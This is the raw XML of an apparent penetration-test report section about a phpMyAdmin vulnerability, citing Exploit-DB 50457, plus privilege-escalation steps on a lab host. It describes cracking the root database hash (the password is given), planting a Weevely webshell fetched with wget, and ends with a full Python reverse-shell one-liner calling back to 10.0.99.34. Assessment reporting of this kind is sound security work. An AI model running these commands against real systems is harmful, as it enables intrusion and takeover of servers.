        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00814189" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00D22B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>44924</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E47099">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00E47099" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>exploitDB</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00E47099" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00D22B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>44928</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E47099">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00E47099" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>exploitDB</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00E47099" w:rsidRPr="00E47099">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00D22B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>50457</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40028598" w14:textId="233E1343" w:rsidR="00E47099" w:rsidRPr="00E47099" w:rsidRDefault="00E47099" w:rsidP="00BF382D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47099">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation of Vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47099">
        <w:t>This vulnerability derives from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47099">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">section </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47099">
        <w:t>of code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where pages are redirected and then loaded within phpMyAdmin, as well as an improper test for whitelisted pages. Requires user to be authenticated, except in certain cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319670E" w14:textId="3B775011" w:rsidR="00E47099" w:rsidRDefault="00E47099" w:rsidP="00BF382D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Hlk119769843"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00E47099">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47099">
        <w:t>Upgrade to phpMyAdmin 4.8.2 or newer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6B18E" w14:textId="3B847756" w:rsidR="00E47099" w:rsidRPr="00E47099" w:rsidRDefault="00E47099" w:rsidP="00BF382D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47099">
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042D703" w14:textId="6B477E08" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="30BADB4A" w14:textId="0A858238" w:rsidR="00E47099" w:rsidRPr="005C565D" w:rsidRDefault="00E47099" w:rsidP="00BF382D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C565D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6659CEA8" w14:textId="0B58ACE6" w:rsidR="005C565D" w:rsidRDefault="00E47099" w:rsidP="00BF382D">
      <w:bookmarkStart w:id="7" w:name="_Hlk119765731"/>
      <w:r>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00D22B74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.exploit-db.com/exploits/50457" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D22B74" w:rsidRPr="00E47099">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>exploitDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D22B74" w:rsidRPr="00E47099">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>50457</w:t>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">execute with </w:t>
      </w:r>
      <w:r w:rsidR="005C565D">
        <w:t>username/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password gained above </w:t>
      </w:r>
      <w:r w:rsidR="005C565D">
        <w:t xml:space="preserve">like the following </w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>screenshot</w:t>
      </w:r>
      <w:r w:rsidR="005C565D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE14442" w14:textId="22410262" w:rsidR="00E47099" w:rsidRDefault="005C565D" w:rsidP="00BF382D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A68F3AC" wp14:editId="78D87717">
            <wp:extent cx="5943600" cy="6559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F072" w14:textId="1B1C149E" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="1F4FA4A7" w14:textId="4D6C576F" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="50632313" w14:textId="0645835F" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="33CD8378" w14:textId="6E394FA8" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="27B1E1A9" w14:textId="6E2ACD29" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="7B0D83A5" w14:textId="5080448E" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="63D2DFEA" w14:textId="2BE4F62A" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="09C48127" w14:textId="529B6B1E" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="2F692F59" w14:textId="714A2DD0" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="45CC8584" w14:textId="522AE3A8" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="526C818A" w14:textId="27B27F59" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="05CC489C" w14:textId="090A42E5" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="69B503D6" w14:textId="60610EDE" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="06844A98" w14:textId="1C2E6AEF" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="3BC911C4" w14:textId="2BBB55DC" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="4CD9A19A" w14:textId="54197220" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="6F3C2604" w14:textId="77777777" w:rsidR="00BF382D" w:rsidRPr="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="7FE718D9" w14:textId="47D1AD61" w:rsidR="00FB5FBB" w:rsidRPr="00BF382D" w:rsidRDefault="00FB5FBB" w:rsidP="00BF382D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc119770788"/>
      <w:r w:rsidRPr="00BF382D">
        <w:lastRenderedPageBreak/>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="51F52AFE" w14:textId="4F4B327E" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB">
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Hlk119768302"/>
      <w:r>
        <w:t xml:space="preserve">Privilege escalation is the process in which design flaws </w:t>
      </w:r>
      <w:r w:rsidR="00BF382D">
        <w:t xml:space="preserve">in operating systems or software </w:t>
      </w:r>
      <w:r w:rsidR="005C565D">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00BF382D">
        <w:t xml:space="preserve"> exploited to gain access to protected resources on a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DCE949" w14:textId="71BDB196" w:rsidR="005C565D" w:rsidRPr="00D22B74" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(NOTE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Screenshots used to </w:t>
      </w:r>
      <w:r w:rsidR="009E3684">
        <w:t>describe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> steps taken by the penetration tester describing the privilege escalation process.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="793E9FC7" w14:textId="7855CA5E" w:rsidR="00D22B74" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="0E41682B" w14:textId="0396ABE2" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">On the authenticated phpMyAdmin webpage, navigated to </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="005446D6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.0.5.28/phpmyadmin/sql.php?db=mysql&amp;table=user&amp;pos=0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E2D85" w14:textId="470FDE21" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F7A539" wp14:editId="4705DD84">
            <wp:extent cx="5943600" cy="1297305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 22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background patter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7546" w14:textId="39A4DDBD" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="390291DB" w14:textId="63EDBB69" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:t>Clicked “Edit” for the root user, the</w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scrolled down to find the authentication string for “root”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F455E3" w14:textId="77777777" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B55FF88" wp14:editId="1CAFACF3">
            <wp:extent cx="5943600" cy="3150870"/>
            <wp:effectExtent l="0" t="0" r="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1C6B" w14:textId="77777777" w:rsidR="008F1AE7" w:rsidRDefault="008F1AE7" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="0372B89A" w14:textId="77777777" w:rsidR="008F1AE7" w:rsidRDefault="008F1AE7" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="72F30D88" w14:textId="77777777" w:rsidR="008F1AE7" w:rsidRDefault="008F1AE7" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="04DB774D" w14:textId="63208DF6" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Taking this hash, cracked it and found it equals the password “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gandalfthewhite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED60506" w14:textId="16F7EDFA" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4707742E" wp14:editId="1F6C40A0">
            <wp:extent cx="5943600" cy="1730375"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="24" name="Picture 2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5DF9" w14:textId="329DDB24" w:rsidR="00DC5F7B" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="6CECC287" w14:textId="0FC9BCE8" w:rsidR="007229B6" w:rsidRDefault="007229B6" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="007229B6">
        <w:t xml:space="preserve">recommended </w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="007229B6">
        <w:t>emediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> here would be to use more unique/non-easily cracked passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4EDA27" w14:textId="77777777" w:rsidR="007229B6" w:rsidRDefault="007229B6" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="16E9556C" w14:textId="6F7B0A04" w:rsidR="005C565D" w:rsidRDefault="00DC5F7B" w:rsidP="00FB5FBB">
      <w:r>
        <w:t>Then, using</w:t>
      </w:r>
      <w:r w:rsidR="005C565D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C565D">
        <w:t>Weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C565D">
        <w:t xml:space="preserve">, created a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C565D">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C565D">
        <w:t xml:space="preserve"> named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C565D">
        <w:t>fotp</w:t>
      </w:r>
      <w:r w:rsidR="007F34F8">
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C565D">
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9E37C8" w14:textId="5AA315F9" w:rsidR="005C565D" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8EE466" wp14:editId="72961668">
            <wp:extent cx="5943600" cy="756920"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5350" w14:textId="14D6C975" w:rsidR="005C565D" w:rsidRDefault="005C565D" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="0EFB40D5" w14:textId="1E3DADE4" w:rsidR="005C565D" w:rsidRDefault="005C565D" w:rsidP="00FB5FBB">
      <w:r>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="00494D4F">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a python webserver on port 8123:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D7386" w14:textId="58691C8A" w:rsidR="005C565D" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5378BFCF" wp14:editId="5A6354B2">
            <wp:extent cx="5924550" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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0D2B" w14:textId="77777777" w:rsidR="005C565D" w:rsidRDefault="005C565D" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="376702C9" w14:textId="7025E25F" w:rsidR="005C565D" w:rsidRDefault="005C565D" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">Using the above downloaded exploit, </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00D22B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>50457</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00494D4F">
        <w:t xml:space="preserve">moved </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00494D4F">
        <w:t xml:space="preserve"> onto the target with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00494D4F">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59107F" w14:textId="0E9DB471" w:rsidR="00D22B74" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E636589" wp14:editId="6933BD97">
            <wp:extent cx="5943600" cy="349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1A4F" w14:textId="119E1893" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="79218B00" w14:textId="16DE89C5" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="72580D53" w14:textId="37042349" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="34CA845B" w14:textId="584472EB" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="6A0BA732" w14:textId="77777777" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="611E8DFB" w14:textId="41F84EE0" w:rsidR="007F34F8" w:rsidRDefault="007F34F8" w:rsidP="00FB5FBB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00494D4F">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00D22B74">
        <w:t xml:space="preserve">connect to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908ECA0" w14:textId="1F5CC25F" w:rsidR="00D22B74" w:rsidRDefault="00D22B74" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08677E4D" wp14:editId="784579F9">
            <wp:extent cx="5943600" cy="2997835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D817" w14:textId="71859FED" w:rsidR="00494D4F" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="2E55426E" w14:textId="43E58270" w:rsidR="00494D4F" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB">
      <w:r>
        <w:t>Started a listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C3668" w14:textId="6F2295D0" w:rsidR="00DC5F7B" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A812CA2" wp14:editId="389A144D">
            <wp:extent cx="3152775" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="9525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4E57" w14:textId="77777777" w:rsidR="007F4B48" w:rsidRDefault="007F4B48" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="44997766" w14:textId="5EBBBC2F" w:rsidR="00D22B74" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB">
      <w:r>
        <w:t>Then us</w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following Python code on the target</w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>starting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a reverse shell (screenshot showing process down successfully):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38042DE3" w14:textId="77777777" w:rsidR="00494D4F" w:rsidRDefault="00494D4F" w:rsidP="00494D4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4D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c "import sys, socket, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00494D4F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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pty;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00494D4F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r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00494D4F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</w:p>
    <w:p w14:paraId="605745C5" w14:textId="77A9613C" w:rsidR="00494D4F" w:rsidRPr="00494D4F" w:rsidRDefault="00494D4F" w:rsidP="00494D4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gramStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket.SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">_STREAM);s.connect(('10.0.99.34',4449));[os.dup2(s.fileno(),fd) for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in (0,1,2)];</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00494D4F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>('/bin/bash');"</w:t>
      </w:r>
    </w:p>
